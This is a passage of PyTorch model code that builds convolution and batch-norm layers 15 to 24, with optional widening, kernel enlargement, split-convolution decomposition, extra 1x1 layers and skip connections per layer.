self.conv15_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv15_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv15_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[15] == 3:
self.conv15_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv15_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[15] == 4:
self.conv15_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv15_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv15_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv15_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv15 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv15 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[15] == 1:
self.conv15_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[15] == 1:
self.conv15_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn15 = torch.nn.BatchNorm2d(params[1])
params = [32, 32, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[15] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[15] / 4) * 4)
if self.widen_list[16] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[16] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[16] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[16])
params[3] = params[3] + 2* int(self.kerneladd_list[16])
params[6] = params[6] + int(self.kerneladd_list[16])
params[7] = params[7] + int(self.kerneladd_list[16])
if self.decompo_list != None:
if self.decompo_list[16] == 1:
self.conv16_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv16_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[16] == 2:
self.conv16_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv16_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv16_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv16_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[16] == 3:
self.conv16_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv16_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[16] == 4:
self.conv16_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv16_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv16_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv16_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv16 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv16 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[16] == 1:
self.conv16_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[16] == 1:
self.conv16_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn16 = torch.nn.BatchNorm2d(params[1])
params = [32, 32, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[16] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[16] / 4) * 4)
if self.widen_list[17] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[17] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[17] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[17])
params[3] = params[3] + 2* int(self.kerneladd_list[17])
params[6] = params[6] + int(self.kerneladd_list[17])
params[7] = params[7] + int(self.kerneladd_list[17])
if self.decompo_list != None:
if self.decompo_list[17] == 1:
self.conv17_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv17_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[17] == 2:
self.conv17_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv17_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv17_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv17_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[17] == 3:
self.conv17_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv17_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[17] == 4:
self.conv17_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv17_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv17_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv17_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv17 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv17 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[17] == 1:
self.conv17_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[17] == 1:
self.conv17_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn17 = torch.nn.BatchNorm2d(params[1])
params = [32, 32, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[17] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[17] / 4) * 4)
if self.widen_list[18] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[18] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[18] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[18])
params[3] = params[3] + 2* int(self.kerneladd_list[18])
params[6] = params[6] + int(self.kerneladd_list[18])
params[7] = params[7] + int(self.kerneladd_list[18])
if self.decompo_list != None:
if self.decompo_list[18] == 1:
self.conv18_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv18_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[18] == 2:
self.conv18_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv18_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv18_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv18_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[18] == 3:
self.conv18_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv18_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[18] == 4:
self.conv18_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv18_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv18_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv18_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv18 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv18 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[18] == 1:
self.conv18_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[18] == 1:
self.conv18_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn18 = torch.nn.BatchNorm2d(params[1])
params = [32, 32, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[18] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[18] / 4) * 4)
if self.widen_list[19] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[19] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[19] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[19])
params[3] = params[3] + 2* int(self.kerneladd_list[19])
params[6] = params[6] + int(self.kerneladd_list[19])
params[7] = params[7] + int(self.kerneladd_list[19])
if self.decompo_list != None:
if self.decompo_list[19] == 1:
self.conv19_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv19_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[19] == 2:
self.conv19_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv19_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv19_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv19_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[19] == 3:
self.conv19_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv19_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[19] == 4:
self.conv19_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv19_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv19_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv19_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv19 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv19 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[19] == 1:
self.conv19_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[19] == 1:
self.conv19_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn19 = torch.nn.BatchNorm2d(params[1])
params = [32, 32, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[19] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[19] / 4) * 4)
if self.widen_list[20] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[20] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[20] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[20])
params[3] = params[3] + 2* int(self.kerneladd_list[20])
params[6] = params[6] + int(self.kerneladd_list[20])
params[7] = params[7] + int(self.kerneladd_list[20])
if self.decompo_list != None:
if self.decompo_list[20] == 1:
self.conv20_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv20_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[20] == 2:
self.conv20_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv20_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv20_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv20_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[20] == 3:
self.conv20_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv20_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[20] == 4:
self.conv20_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv20_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv20_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv20_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv20 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv20 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[20] == 1:
self.conv20_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[20] == 1:
self.conv20_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn20 = torch.nn.BatchNorm2d(params[1])
params = [32, 32, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[20] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[20] / 4) * 4)
if self.widen_list[21] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[21] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[21] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[21])
params[3] = params[3] + 2* int(self.kerneladd_list[21])
params[6] = params[6] + int(self.kerneladd_list[21])
params[7] = params[7] + int(self.kerneladd_list[21])
if self.decompo_list != None:
if self.decompo_list[21] == 1:
self.conv21_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv21_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[21] == 2:
self.conv21_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv21_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv21_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv21_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[21] == 3:
self.conv21_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv21_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[21] == 4:
self.conv21_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv21_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv21_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv21_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv21 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv21 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[21] == 1:
self.conv21_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[21] == 1:
self.conv21_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn21 = torch.nn.BatchNorm2d(params[1])
params = [32, 64, 3, 3, 2, 2, 1, 1]
if self.widen_list != None:
if self.widen_list[21] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[21] / 4) * 4)
if self.widen_list[22] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[22] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[22] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[22])
params[3] = params[3] + 2* int(self.kerneladd_list[22])
params[6] = params[6] + int(self.kerneladd_list[22])
params[7] = params[7] + int(self.kerneladd_list[22])
if self.decompo_list != None:
if self.decompo_list[22] == 1:
self.conv22_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv22_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[22] == 2:
self.conv22_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv22_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv22_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv22_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[22] == 3:
self.conv22_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv22_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[22] == 4:
self.conv22_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv22_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv22_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv22_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv22 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv22 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[22] == 1:
self.conv22_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[22] == 1:
self.conv22_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn22 = torch.nn.BatchNorm2d(params[1])
params = [64, 64, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[22] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[22] / 4) * 4)
if self.widen_list[23] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[23] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[23] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[23])
params[3] = params[3] + 2* int(self.kerneladd_list[23])
params[6] = params[6] + int(self.kerneladd_list[23])
params[7] = params[7] + int(self.kerneladd_list[23])
if self.decompo_list != None:
if self.decompo_list[23] == 1:
self.conv23_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv23_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[23] == 2:
self.conv23_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv23_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv23_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv23_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[23] == 3:
self.conv23_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv23_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[23] == 4:
self.conv23_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv23_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv23_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv23_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv23 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv23 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[23] == 1:
self.conv23_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[23] == 1:
self.conv23_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn23 = torch.nn.BatchNorm2d(params[1])
params = [32, 64, 1, 1, 2, 2, 0, 0]
if self.widen_list != None:
if self.widen_list[23] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[23] / 4) * 4)
if self.widen_list[24] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[24] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[24] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[24])
params[3] = params[3] + 2* int(self.kerneladd_list[24])
params[6] = params[6] + int(self.kerneladd_list[24])
params[7] = params[7] + int(self.kerneladd_list[24])
if self.decompo_list != None:
if self.decompo_list[24] == 1:
self.conv24_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv24_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[24] == 2:
self.conv24_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv24_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv24_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv24_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[24] == 3:
self.conv24_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv24_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[24] == 4:
self.conv24_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv24_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv24_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv24_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv24 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv24 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[24] == 1:
self.conv24_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
